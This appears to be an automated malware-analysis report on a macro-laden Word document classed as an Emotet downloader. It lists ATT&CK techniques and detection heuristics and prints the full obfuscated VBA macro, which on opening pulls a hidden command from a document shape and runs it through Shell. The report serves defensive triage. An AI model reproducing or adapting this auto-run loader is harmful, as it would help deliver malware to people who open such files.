MALICIOUS
Risk Score: 272
Malware Insights
MITRE ATT&CK
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros that execute a heavily obfuscated command-line instruction. This instruction uses cmd.exe to invoke PowerShell, which in turn downloads and executes a second-stage payload from a reconstructed URL. The ClamAV detection name 'Doc.Downloader.Emotet-6826426-0' strongly suggests this is an Emotet downloader variant.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6826426-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826426-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
  - `ibjbp = CByte(24595846)`
  - `CiOuntw = Array(USWMDLkdf, Interaction.Shell(FNTFPfOBu, lNifiJir), HcQbOAcLl)`
  - `On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
  - `Attribute VB_Customizable = True`
  - `Private Sub Document_open()`
  - `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5837 bytes |

SHA-256: 507c21a13e50f982ec7642912771731f8251617f9441d8493382fa5cd47841d5

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 133 of 194 identifiers look randomly generated (e.g. 'OjcKzUwwVFsOw'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "oijcBSdiYswCS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
lsTiLIwqj = Atn(TiVtV)
vQvHINjGh = CLng(vbEjOc)
LGGLvR = Cos(RSJdmHPwf)
iwkLkYJM = CByte(AMUlCsrOK)
PmzwDqpE = CByte(40770098)
avzwTw = CBool(102885109)
DbiwzwQiw = GlvsFKQw
zhVuTDsW = 36255978
YSEczL = CByte(232924356)
Set nAiZtJ = Shapes("OjcKzUwwVFsOw")
On Error Resume Next
mYjRZASDF = Atn(vjEKKJ)
opWKMBWHa = CLng(WkJkjs)
BOGYQvAOS = Cos(mRiswd)
PurpZW = CByte(KzivS)
aPqMIvCaX = CByte(301066528)
vupjpva = CBool(175267935)
qVmBC = swOQNFv
lXaSjAa = 296451890
AWufjaUEH = CByte(138247538)
On Error Resume Next
KVuvMcA = Atn(jiLhzC)
vtLnn = CLng(lfSOwHFSP)
dKtwGqZ = Cos(rouwKlH)
mVHwNt = CByte(cYpchQUv)
QJhWG = CByte(28743102)
EUqvw = CBool(8980796)
VjHiVjKT = kZRZQO
FWtsfADkH = 222213965
DbXzla = CByte(231541375)
FNTFPfOBu = nAiZtJ.TextFrame.ContainingRange
On Error Resume Next
jPqmnv = Atn(sFKcc)
kQuomk = CLng(jVjosKJ)
ntRYp = Cos(kDWmE)
jzzYLDTq = CByte(OTcIwfKf)
tdlAE = CByte(77748740)
EmQAMYBhB = CBool(294761331)
WLcpqSTY = pPqXZYT
bzfunfHQC = 280866733
qSuHGwo = CByte(135436664)
On Error Resume Next
oEsMF = Atn(EiwqowdJ)
LVolKTRY = CLng(XhEBFf)
EwzGDr = Cos(jOpKpo)
QXRnI = CByte(bCbqWfio)
jDZSikB = CByte(211210708)
cUJIW = CBool(134590106)
bkEHJ = OwskCUGj
NYIfmlX = 65417500
OrOKniS = CByte(208949416)
On Error Resume Next
IcNFaRujG = Atn(rKBksjR)
ajPEYRdVo = CLng(LQsRZMn)
IomopDLE = Cos(aGRDk)
stYfDE = CByte(bEcQUqjZk)
zJbcGmrL = CByte(297635714)
ODOWaa = CBool(4448550)
YAhji = NhLYiV
dpRUuIn = 245382052
hTKlh = CByte(156101762)
On Error Resume Next
RoYLqUtnz = Atn(lTLaKSA)
bTsHIkOH = CLng(nKwiz)
VAioNwI = Cos(EvKLplphP)
PfMAKj = CByte(ziKGcwun)
qacdnjSZo = CByte(79347212)
ZYWUFvjPS = CBool(102724892)
qBAQQzn = wQXwvPE
iiMnLwjO = 159446916
qAjSiV = CByte(179635860)
On Error Resume Next
PwPwMrI = Atn(fMOARkvzD)
YXBuP = CLng(bKJPYt)
UmYOnm = Cos(NoURbFb)
hwHOu = CByte(NcUViAXC)
sTlsuNtV = CByte(51175170)
iojCkT = CBool(64067782)
bdLIJzkH = DtElB
HbwpMh = 258047263
czBPvdak = CByte(12166711)
On Error Resume Next
wbmSB = Atn(zYcHH)
naBCTJTX = CLng(YCYrqiwZ)
LEtiNjzWc = Cos(VTCRzCzR)
AklQZQXZ = CByte(bKSzwj)
DqFNVFzjk = CByte(9372891)
VlaotR = CBool(76661574)
IZnTRpH = vSRWUTUu
sEQunF = 212604781
zConmQA = CByte(260494337)
On Error Resume Next
CBXHJQnsw = Atn(CIaVk)
csLCvCJSC = CLng(wjsGjctC)
lvnzmc = Cos(wmwVOjvHv)
jKzzrFFVT = CByte(ApWZO)
FzzosZa = CByte(36545290)
WWhYN = CBool(242325685)
KrvjFPtq = iSVpIQWG
dwHGAHkrv = 137366063
XwGWPiid = CByte(208685961)
Const lNifiJir = 0
On Error Resume Next
jwOXim = Atn(npjGVjB)
hvGqSVGBL = CLng(ziDFnTlUK)
OToQmCz = Cos(tQSKw)
EFYlh = CByte(cvCclHXiB)
VAVdhO = CByte(48668747)
DPXDHvcmi = CBool(336389479)
iuznR = TQMfifPBj
RoSXqzihR = 141415833
nGzwZYj = CByte(125197667)
On Error Resume Next
GoBJwV = Atn(GDsHKini)
TdYSOZH = CLng(iSSioJ)
izTDYivK = Cos(AGXLda)
ETspDpE = CByte(jhpfdCzSu)
ZKPkJ = CByte(3566641)
SLSICvj = CBool(26442069)
NOwTktvVW = pPhKBndIE
LUJrRk = 196411211
pilGblpk = CByte(147046360)
On Error Resume Next
EvfSZSPG = Atn(WMcTpi)
CWwGoPnNX = CLng(AmmKmGHBr)
lzdXIsD = Cos(iEqJwWSh)
VwoIR = CByte(hRdUDjGVS)
ENDtZzvMD = CByte(230653358)
BqnQrE = CBool(26600166)
DDQUEvFf = zzXiYLt
PocXC = 181299663
ibjbp = CByte(24595846)
CiOuntw = Array(USWMDLkdf, Interaction.Shell(FNTFPfOBu, lNifiJir), HcQbOAcLl)
On Error Resume Next
NJNnNit = Atn(DHufuzd)
wIRbd = CLng(ThGiiHEYn)
LtESu = Cos(UIkdVbvE)
NKkOSCh = CByte(XqjjizlTi)
mUBvKM = CByte(93735777)
JrAUslBJ = CBool(138717695)
UKVFdCjcO = qIwJq
IkXRA = 153888527
ispqD = CByte(325434282)
On Error Resume Next
MROkbsB = Atn(GVDnlC)
rcXjjIb = CLng(YMziY)
JUqMESD = Cos(kCRIJ)
FpkRP = CByte(vEUNSQkPp)
bOdpzBM = CByte(181133136)
jaksVRYw = CBool(164414852)
ibiOdaEzc = oinRLaDfU
EcJkf = 132256207
MzwuRL = CByte(125685792)
End Sub